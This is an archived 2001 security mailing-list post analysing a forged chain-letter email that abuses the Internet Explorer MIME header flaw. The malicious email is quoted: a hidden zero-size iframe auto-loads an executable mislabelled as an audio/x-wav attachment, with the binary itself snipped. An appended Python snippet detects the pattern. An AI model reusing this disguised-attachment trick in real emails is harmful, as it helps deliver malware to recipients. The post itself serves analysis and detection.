RE: A very dangerous mail...

From: Aidan O'Kelly (okellyat_private)
Date: Mon Jul 23 2001 - 07:42:40 PDT


    'Microsoft IE MIME Header Attachment Execution Vulnerability'
    It was discovered a couple months ago. If it was an exe it would have run,
    although since it asked you whether you want to save it or run it, it means
    your system is patched anyway.
    
    Explanation and example.
    
    http://www.kriptopolis.com/cua/eml.html
    
    
    
    > -----Original Message-----
    > From: Marius Huse Jacobsen [mailto:mahujaat_private]
    > Sent: 20 July 2001 22:24
    > To: vuln-devat_private
    > Subject: A very dangerous mail...
    > 
    > 
    > -----BEGIN PGP SIGNED MESSAGE-----
    > Hash: SHA1
    > 
    > Edited to protect any innocents.
    > Obvious forgery (supposedly from microsoft.com)
    > I'm using ZoneAlarm MailSafe -> .exe changed to .zl9
    > It tries to start the attachment exe automatically (Outlook Express)
    > - - it asks me if I want to save or start the zl9 file but I 
    > don't know
    > what it would do to an exe.
    > 
    > Exactly how bad is it? The offending line seems to be
    > <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
    > 
    > Html email was a curse to begin with and it hasn't become any better.
    > Can anyone give me that ascii ribbon sig?
    > 
    > 
    > 8< --------- Start offending letter -----------
    > Return-Path: <zinaat_private>
    > Received: from smtp08.somewhereonthenet.com
    > (smtp08.somewhereonthenet.com [196.*.*.*])
    >  by mail.my_isp.com (8.9.3/8.9.3) with ESMTP id PAA16304
    >  for <myat_private>; Sat, 14 Jul 2001 15:10:00 +0200 (MET DST)
    > Received: from microsoft.com ([196.*.*.*])
    >  by smtp08.somewhereonthenet.com (Sun Internet Mail Server
    > sims.3.5.2000.03.23.18.03.p10)
    >  with SMTP id <0GGG009BGSJHYEat_private> for myat_private;
    > Sat,
    >  14 Jul 2001 15:09:40 +0200 (SAT)
    > Date: Sat, 14 Jul 2001 15:09:01 +0100
    > From: Lyndaat_private
    > Subject: Fw: 100,000 lemmings can't be ...
    > To: removedat_private
    > Message-id: <0GGG009BISJHYEat_private>
    > MIME-version: 1.0
    > Content-type: multipart/mixed; boundary="nymph"
    > 
    > This is a multi-part message in MIME format.
    > 
    > - --nymph
    > Content-Type: text/html;
    >         charset="iso-8859-1"
    > Content-Transfer-Encoding: quoted-printable
    > 
    > <HTML>
    > <HEAD>
    > </HEAD>
    > <BODY bgColor=3D#ffffff>
    > <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
    > <P align=center><FONT size=7><SPAN
    > class=590014113-13042001>SMACK!!!</SPAN></FONT></P>
    > <P align=center><FONT size=7><SPAN class=590014113-13042001>You have
    > been
    > hit</SPAN></FONT></P>
    > <P align=center><SPAN class=590014113-13042001>This is the
    > funny-attachment war!
    > You have just been hit and by the rule book you can't hit this person
    > back. To
    > be in the game you need to send this message to five of your friends,
    > try to
    > find some small and funny attachment to send along. If you don't have
    > time use
    > the one you got hit by, go ahead hit someone!</SPAN></P>
    > <P align=center><FONT size=7><SPAN
    > class=590014113-13042001></SPAN></FONT>&nbsp;</P></BODY></HTML>
    > 
    > - --nymph
    > Content-Type: audio/x-wav;
    >         name="setup.zl9"
    > Content-Transfer-Encoding: base64
    > Content-ID: <THE-CID>
    > 
    > <snip .exe content>
    > 
    > - --nymph
    > <snip fortune.zip>
    > 
    > - --nymph--
    > 
    > 
    
    _________________________________________
    Aidan O'Kelly
    Systems Administrator      okellyat_private
    
    Xnet - The Data Storage People
    Dublin: +353 (1) 2740 100
    Belfast: +44(28) 9073 5872
    www.xnet.ie | storageat_private
    
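    As an added example (not part of the thread, and not code from either poster), a small Python checker for the pattern in the quoted message: an HTML body that pulls in a cid: part through a hidden iframe, where that part is declared as audio/x-wav but its name or payload says it is an executable. The sample message is constructed to mirror the quoted one; its "executable" is only a fake MZ header, and the tag list and extension list are my own assumptions.

```python
import re
from email import message_from_string
# Constructed sample modelled on the quoted message (not its bytes); the "wav" part holds only a fake MZ header.
SAMPLE = """\
From: someone@example.invalid
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="nymph"

--nymph
Content-Type: text/html; charset="iso-8859-1"

<HTML><BODY><iframe src=cid:THE-CID height=0 width=0></iframe>SMACK!!!</BODY></HTML>
--nymph
Content-Type: audio/x-wav; name="setup.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

TVqQAAMAAAAEAAAA//8AAA==
--nymph--
"""

# src=cid:... in tags the renderer fetches on its own while displaying the body
CID_REF = re.compile(r'<(?:iframe|img|embed|object)[^>]*\bsrc=["\']?cid:([^"\'\s>]+)', re.I)
EXEC_EXT = ('.exe', '.com', '.scr', '.pif', '.bat', '.vbs')

def find_suspect_parts(raw):
    """Return [(filename, reasons)] for parts the HTML body loads via cid:
    that also look executable despite a non-executable declared type."""
    msg = message_from_string(raw)
    referenced = set()
    for part in msg.walk():
        if part.get_content_type() == 'text/html':
            html = (part.get_payload(decode=True) or b'').decode('latin-1', 'replace')
            referenced.update(c.lower() for c in CID_REF.findall(html))
    findings = []
    for part in (p for p in msg.walk() if not p.is_multipart()):
        cid = (part.get('Content-ID') or '').strip().strip('<>').lower()
        name = part.get_filename() or ''
        ctype = part.get_content_type()
        reasons = []
        if cid and cid in referenced:
            reasons.append('loaded automatically by the HTML body via cid:')
        if name.lower().endswith(EXEC_EXT) and not ctype.startswith('application/'):
            reasons.append('executable filename declared as %s' % ctype)
        if (part.get_payload(decode=True) or b'')[:2] == b'MZ':
            reasons.append('payload starts with MZ (DOS/PE executable header)')
        if len(reasons) >= 2 and reasons[0].startswith('loaded'):
            findings.append((name, reasons))
    return findings
```

    The magic-byte check is the one that survives a filename rename such as ZoneAlarm's .exe to .zl9, since the declared type and name are both under the sender's control.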
    



    This archive was generated by hypermail 2b30 : Mon Jul 23 2001 - 10:53:34 PDT